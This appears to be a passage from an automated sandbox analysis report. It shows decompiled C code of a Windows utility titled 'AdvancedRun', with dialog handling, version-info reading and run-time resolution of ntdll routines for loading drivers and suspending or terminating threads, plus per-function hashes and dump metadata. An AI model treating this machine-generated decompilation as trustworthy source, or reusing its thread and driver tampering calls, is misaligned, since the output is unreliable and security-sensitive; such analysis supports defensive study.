                                                                                                                    • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 85%
                                                                                                                    			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                                                                    0x00401093
                                                                                                                    0x00401096
                                                                                                                    0x00401097
                                                                                                                    0x0040109b
                                                                                                                    0x004010a3
                                                                                                                    0x004010a5
                                                                                                                    0x00401270
                                                                                                                    0x00401278
                                                                                                                    0x004012b3
                                                                                                                    0x0040127a
                                                                                                                    0x00401293
                                                                                                                    0x004012a2
                                                                                                                    0x004012a2
                                                                                                                    0x004012c1
                                                                                                                    0x004012d9
                                                                                                                    0x004012ea
                                                                                                                    0x004012ec
                                                                                                                    0x004012f6
                                                                                                                    0x00000000
                                                                                                                    0x004010ab
                                                                                                                    0x004010ab
                                                                                                                    0x004010ac
                                                                                                                    0x00401231
                                                                                                                    0x00401236
                                                                                                                    0x00401239
                                                                                                                    0x0040123d
                                                                                                                    0x00401249
                                                                                                                    0x00401249
                                                                                                                    0x0040124c
                                                                                                                    0x00000000
                                                                                                                    0x00401252
                                                                                                                    0x00401259
                                                                                                                    0x00401265
                                                                                                                    0x00000000
                                                                                                                    0x00401265
                                                                                                                    0x0040123f
                                                                                                                    0x0040123f
                                                                                                                    0x00401243
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00401243
                                                                                                                    0x004010b2
                                                                                                                    0x004010b2
                                                                                                                    0x004010b5
                                                                                                                    0x004011e1
                                                                                                                    0x004011e3
                                                                                                                    0x004011e6
                                                                                                                    0x0040120e
                                                                                                                    0x00401216
                                                                                                                    0x00000000
                                                                                                                    0x0040121c
                                                                                                                    0x00401224
                                                                                                                    0x00401226
                                                                                                                    0x00401229
                                                                                                                    0x00000000
                                                                                                                    0x0040122f
                                                                                                                    0x00000000
                                                                                                                    0x0040122f
                                                                                                                    0x00401229
                                                                                                                    0x004011e8
                                                                                                                    0x004011e8
                                                                                                                    0x004011ed
                                                                                                                    0x004011fb
                                                                                                                    0x00401203
                                                                                                                    0x00401203
                                                                                                                    0x004010bb
                                                                                                                    0x004010bb
                                                                                                                    0x004010c0
                                                                                                                    0x00401151
                                                                                                                    0x0040115a
                                                                                                                    0x00401168
                                                                                                                    0x0040116b
                                                                                                                    0x0040116e
                                                                                                                    0x00401170
                                                                                                                    0x00401173
                                                                                                                    0x00401180
                                                                                                                    0x00401182
                                                                                                                    0x00401185
                                                                                                                    0x004011a4
                                                                                                                    0x004011ac
                                                                                                                    0x00000000
                                                                                                                    0x004011b2
                                                                                                                    0x004011ba
                                                                                                                    0x004011bc
                                                                                                                    0x004011c7
                                                                                                                    0x004011c9
                                                                                                                    0x004011cb
                                                                                                                    0x00000000
                                                                                                                    0x004011d1
                                                                                                                    0x00000000
                                                                                                                    0x004011d1
                                                                                                                    0x004011cb
                                                                                                                    0x00401187
                                                                                                                    0x00401187
                                                                                                                    0x00401199
                                                                                                                    0x00000000
                                                                                                                    0x00401199
                                                                                                                    0x004010c6
                                                                                                                    0x004010c8
                                                                                                                    0x004012fd
                                                                                                                    0x004012fd
                                                                                                                    0x004012fd
                                                                                                                    0x004010ce
                                                                                                                    0x004010ce
                                                                                                                    0x004010d7
                                                                                                                    0x004010e5
                                                                                                                    0x004010e8
                                                                                                                    0x004010eb
                                                                                                                    0x004010ed
                                                                                                                    0x004010f0
                                                                                                                    0x00401102
                                                                                                                    0x0040111d
                                                                                                                    0x00401125
                                                                                                                    0x00000000
                                                                                                                    0x0040112b
                                                                                                                    0x00401133
                                                                                                                    0x00401135
                                                                                                                    0x00401140
                                                                                                                    0x00401142
                                                                                                                    0x00401144
                                                                                                                    0x00000000
                                                                                                                    0x0040114a
                                                                                                                    0x0040114a
                                                                                                                    0x00000000
                                                                                                                    0x0040114a
                                                                                                                    0x00401144
                                                                                                                    0x00401104
                                                                                                                    0x0040110a
                                                                                                                    0x0040110b
                                                                                                                    0x0040110b
                                                                                                                    0x0040110e
                                                                                                                    0x00401115
                                                                                                                    0x00401117
                                                                                                                    0x00401117
                                                                                                                    0x00401102
                                                                                                                    0x004010c8
                                                                                                                    0x004010c0
                                                                                                                    0x004010b5
                                                                                                                    0x004010ac
                                                                                                                    0x00401303

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                    • String ID: AdvancedRun
                                                                                                                    • API String ID: 829165378-481304740
                                                                                                                    • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                    • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                                    • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                    • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                                                    0x00408e38
                                                                                                                    0x00408e44
                                                                                                                    0x00408e56
                                                                                                                    0x00408e68
                                                                                                                    0x00408e7a
                                                                                                                    0x00408e8c
                                                                                                                    0x00408e9e
                                                                                                                    0x00408eb0
                                                                                                                    0x00408ec2
                                                                                                                    0x00408ed4
                                                                                                                    0x00408ee6
                                                                                                                    0x00408ef8
                                                                                                                    0x00408f0a
                                                                                                                    0x00408f1c
                                                                                                                    0x00408f21
                                                                                                                    0x00408f23
                                                                                                                    0x00000000
                                                                                                                    0x00408f28
                                                                                                                    0x00408f29

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                    • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                    • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                    • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                    • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                    • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                    • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                    • API String ID: 667068680-4280973841
                                                                                                                    • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                    • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                                    • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                    • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 45%
                                                                                                                    			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8;
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc;
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                                                                    0x00408ae3
                                                                                                                    0x00408aeb
                                                                                                                    0x00408af3
                                                                                                                    0x00408b76
                                                                                                                    0x00408b8a
                                                                                                                    0x00408b91
                                                                                                                    0x00408b98
                                                                                                                    0x00408bb1
                                                                                                                    0x00408bb3
                                                                                                                    0x00408bc6
                                                                                                                    0x00408bcc
                                                                                                                    0x00408bda
                                                                                                                    0x00408be0
                                                                                                                    0x00408bf3
                                                                                                                    0x00408bfa
                                                                                                                    0x00408c0b
                                                                                                                    0x00408c12
                                                                                                                    0x00408c17
                                                                                                                    0x00408c1a
                                                                                                                    0x00408c2c
                                                                                                                    0x00408c39
                                                                                                                    0x00408c3d
                                                                                                                    0x00408c3f
                                                                                                                    0x00408c41
                                                                                                                    0x00408c52
                                                                                                                    0x00408c58
                                                                                                                    0x00408c58
                                                                                                                    0x00408c6f
                                                                                                                    0x00408c71
                                                                                                                    0x00408c73
                                                                                                                    0x00408c83
                                                                                                                    0x00408c89
                                                                                                                    0x00408c89
                                                                                                                    0x00408c8a
                                                                                                                    0x00408c8f
                                                                                                                    0x00408c91
                                                                                                                    0x00408c9a
                                                                                                                    0x00408c93
                                                                                                                    0x00408c93
                                                                                                                    0x00408c93
                                                                                                                    0x00408c9f
                                                                                                                    0x00408ca5
                                                                                                                    0x00408caf
                                                                                                                    0x00408cbc
                                                                                                                    0x00408cc2
                                                                                                                    0x00408cc7
                                                                                                                    0x00408ccd
                                                                                                                    0x00408cd0
                                                                                                                    0x00408cd6
                                                                                                                    0x00408cd7
                                                                                                                    0x00408cd8
                                                                                                                    0x00408cde
                                                                                                                    0x00408ce3
                                                                                                                    0x00408ceb
                                                                                                                    0x00408cfe
                                                                                                                    0x00408d03
                                                                                                                    0x00408d06
                                                                                                                    0x00408d0c
                                                                                                                    0x00408d21
                                                                                                                    0x00408d27
                                                                                                                    0x00408d0c
                                                                                                                    0x00000000
                                                                                                                    0x00408ca7
                                                                                                                    0x00408ca7
                                                                                                                    0x00408cad
                                                                                                                    0x00408d28
                                                                                                                    0x00408d2e
                                                                                                                    0x00408d35
                                                                                                                    0x00408d36
                                                                                                                    0x00408d42
                                                                                                                    0x00408d48
                                                                                                                    0x00408d4e
                                                                                                                    0x00408d54
                                                                                                                    0x00408d5a
                                                                                                                    0x00408d60
                                                                                                                    0x00408d66
                                                                                                                    0x00408d6c
                                                                                                                    0x00408d72
                                                                                                                    0x00408d73
                                                                                                                    0x00408d7f
                                                                                                                    0x00408d85
                                                                                                                    0x00408d8a
                                                                                                                    0x00408d8f
                                                                                                                    0x00408d90
                                                                                                                    0x00408da8
                                                                                                                    0x00408db9
                                                                                                                    0x00408dbf
                                                                                                                    0x00408dc5
                                                                                                                    0x00408dc5
                                                                                                                    0x00000000
                                                                                                                    0x00408cad
                                                                                                                    0x00408ca5
                                                                                                                    0x00408af6
                                                                                                                    0x00408afc
                                                                                                                    0x00408b07
                                                                                                                    0x00408b2a
                                                                                                                    0x00408b38
                                                                                                                    0x00408b53
                                                                                                                    0x00408b56
                                                                                                                    0x00408b62
                                                                                                                    0x00408b6a
                                                                                                                    0x00408b6a
                                                                                                                    0x00408b2a
                                                                                                                    0x00408b07
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                                    • {Unknown}, xrefs: 00408BA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                    • API String ID: 4111938811-1819279800
                                                                                                                    • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                    • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                                    • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                    • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 82%
                                                                                                                    			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                                                                    0x0040b04d
                                                                                                                    0x0040b05e
                                                                                                                    0x0040b060
                                                                                                                    0x0040b063
                                                                                                                    0x0040b06a
                                                                                                                    0x0040b06d
                                                                                                                    0x0040b076
                                                                                                                    0x0040b07b
                                                                                                                    0x0040b07e
                                                                                                                    0x0040b084
                                                                                                                    0x0040b08e
                                                                                                                    0x0040b0a8
                                                                                                                    0x0040b0aa
                                                                                                                    0x0040b0ad
                                                                                                                    0x0040b0b0
                                                                                                                    0x0040b0b3
                                                                                                                    0x0040b0b6
                                                                                                                    0x0040b0b8
                                                                                                                    0x0040b0bb
                                                                                                                    0x0040b0be
                                                                                                                    0x0040b0c1
                                                                                                                    0x0040b0c4
                                                                                                                    0x0040b0c7
                                                                                                                    0x0040b0ca
                                                                                                                    0x0040b0cd
                                                                                                                    0x0040b0cd
                                                                                                                    0x0040b0e5
                                                                                                                    0x0040b11f
                                                                                                                    0x0040b128
                                                                                                                    0x0040b0e7
                                                                                                                    0x0040b0e7
                                                                                                                    0x0040b0f1
                                                                                                                    0x0040b0f2
                                                                                                                    0x0040b0f3
                                                                                                                    0x0040b0fb
                                                                                                                    0x0040b0fd
                                                                                                                    0x0040b0fe
                                                                                                                    0x0040b11d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040b11d
                                                                                                                    0x0040b13c
                                                                                                                    0x0040b151
                                                                                                                    0x0040b166
                                                                                                                    0x0040b17b
                                                                                                                    0x0040b190
                                                                                                                    0x0040b1a5
                                                                                                                    0x0040b1ba
                                                                                                                    0x0040b1cf
                                                                                                                    0x0040b1d6
                                                                                                                    0x0040b1d7
                                                                                                                    0x0040b1d8
                                                                                                                    0x0040b1de
                                                                                                                    0x0040b1e3

                                                                                                                    APIs
                                                                                                                    • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                    • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                    • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                    • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                    • wcscpy.MSVCRT ref: 0040B128
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
